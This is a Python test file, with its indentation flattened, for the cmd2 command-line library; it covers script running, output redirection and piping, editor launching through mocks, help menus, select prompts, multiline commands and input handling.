file_name = utils.quote_string('nothingweird.txt')
out, err = run_cmd(base_app, "_relative_run_script {}".format(file_name))
run_script_mock.assert_called_once_with('"nothingweird.txt"')
run_script_mock.reset_mock()
file_name = utils.quote_string('has spaces.txt')
out, err = run_cmd(base_app, "_relative_run_script {}".format(file_name))
run_script_mock.assert_called_once_with('"has spaces.txt"')
run_script_mock.reset_mock()
file_name = utils.quote_string('"is_double_quoted.txt"')
out, err = run_cmd(base_app, "_relative_run_script {}".format(file_name))
run_script_mock.assert_called_once_with('\'"is_double_quoted.txt"\'')
run_script_mock.reset_mock()
file_name = utils.quote_string("'is_single_quoted.txt'")
out, err = run_cmd(base_app, "_relative_run_script {}".format(file_name))
run_script_mock.assert_called_once_with('"\'is_single_quoted.txt\'"')
run_script_mock.reset_mock()
def test_relative_run_script_requires_an_argument(base_app):
out, err = run_cmd(base_app, '_relative_run_script')
assert 'Error: the following arguments' in err[1]
def test_in_script(request):
class HookApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.register_cmdfinalization_hook(self.hook)
def hook(self: cmd2.Cmd, data: plugin.CommandFinalizationData) -> plugin.CommandFinalizationData:
if self.in_script():
self.poutput("WE ARE IN SCRIPT")
return data
hook_app = HookApp()
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
out, err = run_cmd(hook_app, 'run_script {}'.format(filename))
assert "WE ARE IN SCRIPT" in out[-1]
def test_output_redirection(base_app):
fd, filename = tempfile.mkstemp(prefix='cmd2_test', suffix='.txt')
os.close(fd)
try:
# Verify that writing to a file works
run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.read()
verify_help_text(base_app, content)
# Verify that appending to a file also works
run_cmd(base_app, 'help history >> {}'.format(filename))
with open(filename) as f:
appended_content = f.read()
assert appended_content.startswith(content)
assert len(appended_content) > len(content)
except Exception:
raise
finally:
os.remove(filename)
def test_output_redirection_to_nonexistent_directory(base_app):
filename = '~/fakedir/this_does_not_exist.txt'
# Verify that writing to a file in a non-existent directory doesn't work
run_cmd(base_app, 'help > {}'.format(filename))
with pytest.raises(FileNotFoundError):
with open(filename) as f:
content = f.read()
verify_help_text(base_app, content)
# Verify that appending to a file also works
run_cmd(base_app, 'help history >> {}'.format(filename))
with pytest.raises(FileNotFoundError):
with open(filename) as f:
appended_content = f.read()
verify_help_text(base_app, appended_content)
assert len(appended_content) > len(content)
def test_output_redirection_to_too_long_filename(base_app):
filename = '~/sdkfhksdjfhkjdshfkjsdhfkjsdhfkjdshfkjdshfkjshdfkhdsfkjhewfuihewiufhweiufhiweufhiuewhiuewhfiuwehfia' \
'ewhfiuewhfiuewhfiuewhiuewhfiuewhfiuewfhiuwehewiufhewiuhfiweuhfiuwehfiuewfhiuwehiuewfhiuewhiewuhfiueh' \
'fiuwefhewiuhewiufhewiufhewiufhewiufhewiufhewiufhewiufhewiuhewiufhewiufhewiuheiufhiuewheiwufhewiufheu' \
'fheiufhieuwhfewiuhfeiufhiuewfhiuewheiwuhfiuewhfiuewhfeiuwfhewiufhiuewhiuewhfeiuwhfiuwehfuiwehfiuehie' \
'whfieuwfhieufhiuewhfeiuwfhiuefhueiwhfw'
# Verify that writing to a file in a non-existent directory doesn't work
run_cmd(base_app, 'help > {}'.format(filename))
with pytest.raises(OSError):
with open(filename) as f:
content = f.read()
verify_help_text(base_app, content)
# Verify that appending to a file also works
run_cmd(base_app, 'help history >> {}'.format(filename))
with pytest.raises(OSError):
with open(filename) as f:
appended_content = f.read()
verify_help_text(base_app, content)
assert len(appended_content) > len(content)
def test_feedback_to_output_true(base_app):
base_app.feedback_to_output = True
base_app.timing = True
f, filename = tempfile.mkstemp(prefix='cmd2_test', suffix='.txt')
os.close(f)
try:
run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.readlines()
assert content[-1].startswith('Elapsed: ')
except:
raise
finally:
os.remove(filename)
def test_feedback_to_output_false(base_app):
base_app.feedback_to_output = False
base_app.timing = True
f, filename = tempfile.mkstemp(prefix='feedback_to_output', suffix='.txt')
os.close(f)
try:
out, err = run_cmd(base_app, 'help > {}'.format(filename))
with open(filename) as f:
content = f.readlines()
assert not content[-1].startswith('Elapsed: ')
assert err[0].startswith('Elapsed')
except:
raise
finally:
os.remove(filename)
def test_disallow_redirection(base_app):
# Set allow_redirection to False
base_app.allow_redirection = False
filename = 'test_allow_redirect.txt'
# Verify output wasn't redirected
out, err = run_cmd(base_app, 'help > {}'.format(filename))
verify_help_text(base_app, out)
# Verify that no file got created
assert not os.path.exists(filename)
def test_pipe_to_shell(base_app):
if sys.platform == "win32":
# Windows
command = 'help | sort'
else:
# Mac and Linux
# Get help on help and pipe its output to the input of the word count shell command
command = 'help help | wc'
out, err = run_cmd(base_app, command)
assert out and not err
def test_pipe_to_shell_and_redirect(base_app):
filename = 'out.txt'
if sys.platform == "win32":
# Windows
command = 'help | sort > {}'.format(filename)
else:
# Mac and Linux
# Get help on help and pipe its output to the input of the word count shell command
command = 'help help | wc > {}'.format(filename)
out, err = run_cmd(base_app, command)
assert not out and not err
assert os.path.exists(filename)
os.remove(filename)
def test_pipe_to_shell_error(base_app):
# Try to pipe command output to a shell command that doesn't exist in order to produce an error
out, err = run_cmd(base_app, 'help | foobarbaz.this_does_not_exist')
assert not out
assert "Pipe process exited with code" in err[0]
@pytest.mark.skipif(not clipboard.can_clip,
reason="Pyperclip could not find a copy/paste mechanism for your system")
def test_send_to_paste_buffer(base_app):
# Test writing to the PasteBuffer/Clipboard
run_cmd(base_app, 'help >')
paste_contents = cmd2.cmd2.get_paste_buffer()
verify_help_text(base_app, paste_contents)
# Test appending to the PasteBuffer/Clipboard
run_cmd(base_app, 'help history >>')
appended_contents = cmd2.cmd2.get_paste_buffer()
assert appended_contents.startswith(paste_contents)
assert len(appended_contents) > len(paste_contents)
def test_base_timing(base_app):
base_app.feedback_to_output = False
out, err = run_cmd(base_app, 'set timing True')
expected = normalize("""timing - was: False
now: True
""")
assert out == expected
if sys.platform == 'win32':
assert err[0].startswith('Elapsed: 0:00:00')
else:
assert err[0].startswith('Elapsed: 0:00:00.0')
def _expected_no_editor_error():
expected_exception = 'OSError'
# If PyPy, expect a different exception than with Python 3
if hasattr(sys, "pypy_translation_info"):
expected_exception = 'EnvironmentError'
expected_text = normalize("""
EXCEPTION of type '{}' occurred with message: 'Please use 'set editor' to specify your text editing program of choice.'
To enable full traceback, run the following command: 'set debug true'
""".format(expected_exception))
return expected_text
def test_base_debug(base_app):
# Purposely set the editor to None
base_app.editor = None
# Make sure we get an exception, but cmd2 handles it
out, err = run_cmd(base_app, 'edit')
expected = _expected_no_editor_error()
assert err == expected
# Set debug true
out, err = run_cmd(base_app, 'set debug True')
expected = normalize("""
debug - was: False
now: True
""")
assert out == expected
# Verify that we now see the exception traceback
out, err = run_cmd(base_app, 'edit')
assert err[0].startswith('Traceback (most recent call last):')
def test_debug_not_settable(base_app):
# Set debug to False and make it unsettable
base_app.debug = False
del base_app.settable['debug']
# Cause an exception
out, err = run_cmd(base_app, 'bad "quote')
# Since debug is unsettable, the user will not be given the option to enable a full traceback
assert err == ['Invalid syntax: No closing quotation']
def test_edit_file(base_app, request, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'script.txt')
run_cmd(base_app, 'edit {}'.format(filename))
# We think we have an editor, so should expect a Popen call
m.assert_called_once()
def test_edit_file_with_odd_file_names(base_app, monkeypatch):
"""Test editor and file names with various patterns"""
# Mock out the do_shell call to see what args are passed to it
shell_mock = mock.MagicMock(name='do_shell')
monkeypatch.setattr("cmd2.Cmd.do_shell", shell_mock)
base_app.editor = 'fooedit'
file_name = utils.quote_string('nothingweird.py')
out, err = run_cmd(base_app, "edit {}".format(file_name))
shell_mock.assert_called_once_with('"fooedit" "nothingweird.py"')
shell_mock.reset_mock()
base_app.editor = 'foo edit'
file_name = utils.quote_string('has spaces.py')
out, err = run_cmd(base_app, "edit {}".format(file_name))
shell_mock.assert_called_once_with('"foo edit" "has spaces.py"')
shell_mock.reset_mock()
base_app.editor = '"fooedit"'
file_name = utils.quote_string('"is_double_quoted.py"')
out, err = run_cmd(base_app, "edit {}".format(file_name))
shell_mock.assert_called_once_with('\'"fooedit"\' \'"is_double_quoted.py"\'')
shell_mock.reset_mock()
base_app.editor = "'fooedit'"
file_name = utils.quote_string("'is_single_quoted.py'")
out, err = run_cmd(base_app, "edit {}".format(file_name))
shell_mock.assert_called_once_with('"\'fooedit\'" "\'is_single_quoted.py\'"')
shell_mock.reset_mock()
def test_edit_file_with_spaces(base_app, request, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
test_dir = os.path.dirname(request.module.__file__)
filename = os.path.join(test_dir, 'my commands.txt')
run_cmd(base_app, 'edit "{}"'.format(filename))
# We think we have an editor, so should expect a Popen call
m.assert_called_once()
def test_edit_blank(base_app, monkeypatch):
# Set a fake editor just to make sure we have one. We aren't really going to call it due to the mock
base_app.editor = 'fooedit'
# Mock out the subprocess.Popen call so we don't actually open an editor
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
run_cmd(base_app, 'edit')
# We have an editor, so should expect a Popen call
m.assert_called_once()
def test_base_py_interactive(base_app):
# Mock out the InteractiveConsole.interact() call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='interact')
InteractiveConsole.interact = m
run_cmd(base_app, "py")
# Make sure our mock was called once and only once
m.assert_called_once()
def test_base_cmdloop_with_startup_commands():
intro = 'Hello World, this is an intro ...'
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog", 'quit']
expected = intro + '\n'
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = True
# Run the command loop with custom intro
app.cmdloop(intro=intro)
out = app.stdout.getvalue()
assert out == expected
def test_base_cmdloop_without_startup_commands():
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog"]
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = True
app.intro = 'Hello World, this is an intro ...'
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='quit')
builtins.input = m
expected = app.intro + '\n'
# Run the command loop
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
def test_cmdloop_without_rawinput():
# Need to patch sys.argv so cmd2 doesn't think it was called with arguments equal to the py.test args
testargs = ["prog"]
with mock.patch.object(sys, 'argv', testargs):
app = CreateOutsimApp()
app.use_rawinput = False
app.echo = False
app.intro = 'Hello World, this is an intro ...'
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input', return_value='quit')
builtins.input = m
expected = app.intro + '\n'
with pytest.raises(OSError):
app.cmdloop()
out = app.stdout.getvalue()
assert out == expected
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="stty sane only run on Linux/Mac")
def test_stty_sane(base_app, monkeypatch):
"""Make sure stty sane is run on Linux/Mac after each command if stdin is a terminal"""
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=True)):
# Mock out the subprocess.Popen call so we don't actually run stty sane
m = mock.MagicMock(name='Popen')
monkeypatch.setattr("subprocess.Popen", m)
base_app.onecmd_plus_hooks('help')
m.assert_called_once_with(['stty', 'sane'])
class HookFailureApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# register a postparsing hook method
self.register_postparsing_hook(self.postparsing_precmd)
def postparsing_precmd(self, data: cmd2.plugin.PostparsingData) -> cmd2.plugin.PostparsingData:
"""Simulate precmd hook failure."""
data.stop = True
return data
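# Added note (not part of the original tests): returning the PostparsingData
# object with data.stop set to True tells cmd2 to stop the command loop, so
# onecmd_plus_hooks() returns True; test_precmd_hook_failure below relies on
# exactly that return value.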
@pytest.fixture
def hook_failure():
app = HookFailureApp()
return app
def test_precmd_hook_success(base_app):
out = base_app.onecmd_plus_hooks('help')
assert out is False
def test_precmd_hook_failure(hook_failure):
out = hook_failure.onecmd_plus_hooks('help')
assert out is True
class SayApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_say(self, arg):
self.poutput(arg)
@pytest.fixture
def say_app():
app = SayApp(allow_cli_args=False)
app.stdout = utils.StdSim(app.stdout)
return app
def test_interrupt_quit(say_app):
say_app.quit_on_sigint = True
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input')
m.side_effect = ['say hello', KeyboardInterrupt(), 'say goodbye', 'eof']
builtins.input = m
try:
say_app.cmdloop()
except KeyboardInterrupt:
pass
# And verify the expected output to stdout
out = say_app.stdout.getvalue()
assert out == 'hello\n'
def test_interrupt_noquit(say_app):
say_app.quit_on_sigint = False
# Mock out the input call so we don't actually wait for a user's response on stdin
m = mock.MagicMock(name='input')
m.side_effect = ['say hello', KeyboardInterrupt(), 'say goodbye', 'eof']
builtins.input = m
try:
say_app.cmdloop()
except KeyboardInterrupt:
pass
# And verify the expected output to stdout
out = say_app.stdout.getvalue()
assert out == 'hello\n^C\ngoodbye\n'
class ShellApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.default_to_shell = True
def test_default_to_shell(base_app, monkeypatch):
if sys.platform.startswith('win'):
line = 'dir'
else:
line = 'ls'
base_app.default_to_shell = True
m = mock.Mock()
monkeypatch.setattr("{}.Popen".format('subprocess'), m)
out, err = run_cmd(base_app, line)
assert out == []
assert m.called
def test_ansi_prompt_not_escaped(base_app):
from cmd2.rl_utils import rl_make_safe_prompt
prompt = '(Cmd) '
assert rl_make_safe_prompt(prompt) == prompt
def test_ansi_prompt_escaped():
from cmd2.rl_utils import rl_make_safe_prompt
app = cmd2.Cmd()
color = 'cyan'
prompt = 'InColor'
color_prompt = ansi.style(prompt, fg=color)
readline_hack_start = "\x01"
readline_hack_end = "\x02"
readline_safe_prompt = rl_make_safe_prompt(color_prompt)
assert prompt != color_prompt
if sys.platform.startswith('win'):
# PyReadline on Windows doesn't suffer from the GNU readline bug which requires the hack
assert readline_safe_prompt.startswith(ansi.fg_lookup(color))
assert readline_safe_prompt.endswith(ansi.FG_RESET)
else:
assert readline_safe_prompt.startswith(readline_hack_start + ansi.fg_lookup(color) + readline_hack_end)
assert readline_safe_prompt.endswith(readline_hack_start + ansi.FG_RESET + readline_hack_end)
class HelpApp(cmd2.Cmd):
"""Class for testing custom help_* methods which override docstring help."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_squat(self, arg):
"""This docstring help will never be shown because the help_squat method overrides it."""
pass
def help_squat(self):
self.stdout.write('This command does diddly squat...\n')
def do_edit(self, arg):
"""This overrides the edit command and does nothing."""
pass
# This command will be in the "undocumented" section of the help menu
def do_undoc(self, arg):
pass
@pytest.fixture
def help_app():
app = HelpApp()
return app
def test_custom_command_help(help_app):
out, err = run_cmd(help_app, 'help squat')
expected = normalize('This command does diddly squat...')
assert out == expected
def test_custom_help_menu(help_app):
out, err = run_cmd(help_app, 'help')
verify_help_text(help_app, out)
def test_help_undocumented(help_app):
out, err = run_cmd(help_app, 'help undoc')
assert err[0].startswith("No help on undoc")
def test_help_overridden_method(help_app):
out, err = run_cmd(help_app, 'help edit')
expected = normalize('This overrides the edit command and does nothing.')
assert out == expected
class HelpCategoriesApp(cmd2.Cmd):
"""Class for testing custom help_* methods which override docstring help."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@cmd2.with_category('Some Category')
def do_diddly(self, arg):
"""This command does diddly"""
pass
# This command will be in the "Some Category" section of the help menu even though it has no docstring
@cmd2.with_category("Some Category")
def do_cat_nodoc(self, arg):
pass
def do_squat(self, arg):
"""This docstring help will never be shown because the help_squat method overrides it."""
pass
def help_squat(self):
self.stdout.write('This command does diddly squat...\n')
def do_edit(self, arg):
"""This overrides the edit command and does nothing."""
pass
cmd2.categorize((do_squat, do_edit), 'Custom Category')
# This command will be in the "undocumented" section of the help menu
def do_undoc(self, arg):
pass
@pytest.fixture
def helpcat_app():
app = HelpCategoriesApp()
return app
def test_help_cat_base(helpcat_app):
out, err = run_cmd(helpcat_app, 'help')
verify_help_text(helpcat_app, out)
def test_help_cat_verbose(helpcat_app):
out, err = run_cmd(helpcat_app, 'help --verbose')
verify_help_text(helpcat_app, out)
class SelectApp(cmd2.Cmd):
def do_eat(self, arg):
"""Eat something, with a selection of sauces to choose from."""
# Pass in a single string of space-separated selections
sauce = self.select('sweet salty', 'Sauce? ')
result = '{food} with {sauce} sauce, yum!'
result = result.format(food=arg, sauce=sauce)
self.stdout.write(result + '\n')
def do_study(self, arg):
"""Learn something, with a selection of subjects to choose from."""
# Pass in a list of strings for selections
subject = self.select(['math', 'science'], 'Subject? ')
result = 'Good luck learning {}!\n'.format(subject)
self.stdout.write(result)
def do_procrastinate(self, arg):
"""Waste time in your manner of choice."""
# Pass in a list of tuples for selections
leisure_activity = self.select([('Netflix and chill', 'Netflix'), ('YouTube', 'WebSurfing')],
'How would you like to procrastinate? ')
result = 'Have fun procrastinating with {}!\n'.format(leisure_activity)
self.stdout.write(result)
def do_play(self, arg):
"""Play your favorite musical instrument."""
# Pass in an uneven list of tuples for selections
instrument = self.select([('Guitar', 'Electric Guitar'), ('Drums',)], 'Instrument? ')
result = 'Charm us with the {}...\n'.format(instrument)
self.stdout.write(result)
@pytest.fixture
def select_app():
app = SelectApp()
return app
def test_select_options(select_app, monkeypatch):
# Mock out the read_input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'bacon'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
{} with salty sauce, yum!
""".format(food))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Sauce? ')
# And verify the expected output to stdout
assert out == expected
def test_select_invalid_option_too_big(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input')
# If side_effect is an iterable then each call to the mock will return the next value from the iterable.
read_input_mock.side_effect = ['3', '1'] # First pass an invalid selection, then pass a valid one
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
'3' isn't a valid choice. Pick a number between 1 and 2:
{} with sweet sauce, yum!
""".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
# And verify the expected output to stdout
assert out == expected
def test_select_invalid_option_too_small(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input')
# If side_effect is an iterable then each call to the mock will return the next value from the iterable.
read_input_mock.side_effect = ['0', '1'] # First pass an invalid selection, then pass a valid one
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
expected = normalize("""
1. sweet
2. salty
'0' isn't a valid choice. Pick a number between 1 and 2:
{} with sweet sauce, yum!
""".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
# And verify the expected output to stdout
assert out == expected
def test_select_list_of_strings(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "study")
expected = normalize("""
1. math
2. science
Good luck learning {}!
""".format('science'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Subject? ')
# And verify the expected output to stdout
assert out == expected
def test_select_list_of_tuples(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "procrastinate")
expected = normalize("""
1. Netflix
2. WebSurfing
Have fun procrastinating with {}!
""".format('YouTube'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('How would you like to procrastinate? ')
# And verify the expected output to stdout
assert out == expected
def test_select_uneven_list_of_tuples(select_app, monkeypatch):
# Mock out the input call so we don't actually wait for a user's response on stdin
read_input_mock = mock.MagicMock(name='read_input', return_value='2')
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
out, err = run_cmd(select_app, "play")
expected = normalize("""
1. Electric Guitar
2. Drums
Charm us with the {}...
""".format('Drums'))
# Make sure our mock was called with the expected arguments
read_input_mock.assert_called_once_with('Instrument? ')
# And verify the expected output to stdout
assert out == expected
def test_select_eof(select_app, monkeypatch):
# Ctrl-D during select causes an EOFError that just reprompts the user
read_input_mock = mock.MagicMock(name='read_input', side_effect=[EOFError, 2])
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
food = 'fish'
out, err = run_cmd(select_app, "eat {}".format(food))
# Make sure our mock was called exactly twice with the expected arguments
arg = 'Sauce? '
calls = [mock.call(arg), mock.call(arg)]
read_input_mock.assert_has_calls(calls)
assert read_input_mock.call_count == 2
def test_select_ctrl_c(outsim_app, monkeypatch, capsys):
# Ctrl-C during select prints ^C and raises a KeyboardInterrupt
read_input_mock = mock.MagicMock(name='read_input', side_effect=KeyboardInterrupt)
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
with pytest.raises(KeyboardInterrupt):
outsim_app.select([('Guitar', 'Electric Guitar'), ('Drums',)], 'Instrument? ')
out = outsim_app.stdout.getvalue()
assert out.rstrip().endswith('^C')
class HelpNoDocstringApp(cmd2.Cmd):
greet_parser = argparse.ArgumentParser()
greet_parser.add_argument('-s', '--shout', action="store_true", help="N00B EMULATION MODE")
@cmd2.with_argparser_and_unknown_args(greet_parser)
def do_greet(self, opts, arg):
arg = ''.join(arg)
if opts.shout:
arg = arg.upper()
self.stdout.write(arg + '\n')
def test_help_with_no_docstring(capsys):
app = HelpNoDocstringApp()
app.onecmd_plus_hooks('greet -h')
out, err = capsys.readouterr()
assert err == ''
assert out == """usage: greet [-h] [-s]
optional arguments:
-h, --help show this help message and exit
-s, --shout N00B EMULATION MODE
"""
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="utils.which function only used on Mac and Linux")
def test_which_editor_good():
import platform
editor = 'vi'
path = utils.which(editor)
if 'azure' in platform.release().lower():
# vi doesn't exist on VSTS Hosted Linux agents
assert not path
else:
# Assert that the vi editor was found because it should exist on all Mac and Linux systems
assert path
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="utils.which function only used on Mac and Linux")
def test_which_editor_bad():
nonexistent_editor = 'this_editor_does_not_exist.exe'
path = utils.which(nonexistent_editor)
# Assert that the non-existent editor wasn't found
assert path is None
class MultilineApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, multiline_commands=['orate'], **kwargs)
orate_parser = argparse.ArgumentParser()
orate_parser.add_argument('-s', '--shout', action="store_true", help="N00B EMULATION MODE")
@cmd2.with_argparser_and_unknown_args(orate_parser)
def do_orate(self, opts, arg):
arg = ''.join(arg)
if opts.shout:
arg = arg.upper()
self.stdout.write(arg + '\n')
@pytest.fixture
def multiline_app():
app = MultilineApp()
return app
def test_multiline_complete_empty_statement_raises_exception(multiline_app):
with pytest.raises(cmd2.EmptyStatement):
multiline_app._complete_statement('')
def test_multiline_complete_statement_without_terminator(multiline_app):
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', return_value='\n')
builtins.input = m
command = 'orate'
args = 'hello world'
line = '{} {}'.format(command, args)
statement = multiline_app._complete_statement(line)
assert statement == args
assert statement.command == command
assert statement.multiline_command == command
def test_multiline_complete_statement_with_unclosed_quotes(multiline_app):
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', side_effect=['quotes', '" now closed;'])
builtins.input = m
line = 'orate hi "partially open'
statement = multiline_app._complete_statement(line)
assert statement == 'hi "partially open\nquotes\n" now closed'
assert statement.command == 'orate'
assert statement.multiline_command == 'orate'
assert statement.terminator == ';'
def test_multiline_input_line_to_statement(multiline_app):
# Verify _input_line_to_statement saves the fully entered input line for multiline commands
# Mock out the input call so we don't actually wait for a user's response
# on stdin when it looks for more input
m = mock.MagicMock(name='input', side_effect=['person', '\n'])
builtins.input = m
line = 'orate hi'
statement = multiline_app._input_line_to_statement(line)
assert statement.raw == 'orate hi\nperson\n'
assert statement == 'hi person'
assert statement.command == 'orate'
assert statement.multiline_command == 'orate'
def test_clipboard_failure(base_app, capsys):
# Force cmd2 clipboard to be disabled
base_app._can_clip = False
# Redirect command output to the clipboard when a clipboard isn't present
base_app.onecmd_plus_hooks('help > ')
# Make sure we got the error output
out, err = capsys.readouterr()
assert out == ''
assert 'Cannot redirect to paste buffer;' in err and 'pyperclip' in err
class CommandResultApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_affirmative(self, arg):
self.last_result = cmd2.CommandResult(arg, data=True)
def do_negative(self, arg):
self.last_result = cmd2.CommandResult(arg, data=False)
def do_affirmative_no_data(self, arg):
self.last_result = cmd2.CommandResult(arg)
def do_negative_no_data(self, arg):
self.last_result = cmd2.CommandResult('', arg)
@pytest.fixture
def commandresult_app():
app = CommandResultApp()
return app
def test_commandresult_truthy(commandresult_app):
arg = 'foo'
run_cmd(commandresult_app, 'affirmative {}'.format(arg))
assert commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg, data=True)
run_cmd(commandresult_app, 'affirmative_no_data {}'.format(arg))
assert commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg)
def test_commandresult_falsy(commandresult_app):
arg = 'bar'
run_cmd(commandresult_app, 'negative {}'.format(arg))
assert not commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult(arg, data=False)
run_cmd(commandresult_app, 'negative_no_data {}'.format(arg))
assert not commandresult_app.last_result
assert commandresult_app.last_result == cmd2.CommandResult('', arg)
def test_is_text_file_bad_input(base_app):
# Test with a non-existent file
file_is_valid = utils.is_text_file('does_not_exist.txt')
assert not file_is_valid
# Test with a directory
dir_is_valid = utils.is_text_file('.')
assert not dir_is_valid
def test_eof(base_app):
# Only thing to verify is that it returns True
assert base_app.do_eof('')
def test_echo(capsys):
app = cmd2.Cmd()
app.echo = True
commands = ['help history']
app.runcmds_plus_hooks(commands)
out, err = capsys.readouterr()
assert out.startswith('{}{}\n'.format(app.prompt, commands[0]) + HELP_HISTORY.split()[0])
def test_read_input_rawinput_true(capsys, monkeypatch):
prompt_str = 'the_prompt'
input_str = 'some input'
app = cmd2.Cmd()
app.use_rawinput = True
# Mock out input() to return input_str
monkeypatch.setattr("builtins.input", lambda *args: input_str)
# isatty is True
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=True)):
line = app.read_input(prompt_str)
assert line == input_str
# isatty is False
with mock.patch('sys.stdin.isatty', mock.MagicMock(name='isatty', return_value=False)):
# echo True
app.echo = True
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == "{}{}\n".format(prompt_str, input_str)
# echo False
app.echo = False
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert not out
def test_read_input_rawinput_false(capsys, monkeypatch):
prompt_str = 'the_prompt'
input_str = 'some input'
def make_app(isatty: bool, empty_input: bool = False):
"""Make a cmd2 app with a custom stdin"""
app_input_str = '' if empty_input else input_str
fakein = io.StringIO('{}'.format(app_input_str))
fakein.isatty = mock.MagicMock(name='isatty', return_value=isatty)
new_app = cmd2.Cmd(stdin=fakein)
new_app.use_rawinput = False
return new_app
# isatty True
app = make_app(isatty=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == prompt_str
# isatty True, empty input
app = make_app(isatty=True, empty_input=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == 'eof'
assert out == prompt_str
# isatty is False, echo is True
app = make_app(isatty=False)
app.echo = True
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert out == "{}{}\n".format(prompt_str, input_str)
# isatty is False, echo is False
app = make_app(isatty=False)
app.echo = False
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == input_str
assert not out
# isatty is False, empty input
app = make_app(isatty=False, empty_input=True)
line = app.read_input(prompt_str)
out, err = capsys.readouterr()
assert line == 'eof'
assert not out
def test_read_command_line_eof(base_app, monkeypatch):
read_input_mock = mock.MagicMock(name='read_input', side_effect=EOFError)
monkeypatch.setattr("cmd2.Cmd.read_input", read_input_mock)
line = base_app._read_command_line("Prompt> ")
assert line == 'eof'
def test_poutput_string(outsim_app):
msg = 'This is a test'
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = msg + '\n'
assert out == expected
def test_poutput_zero(outsim_app):
msg = 0
outsim_app.poutput(msg)
out = outsim_app.stdout.getvalue()
expected = str(msg) + '\n'
assert out == expected
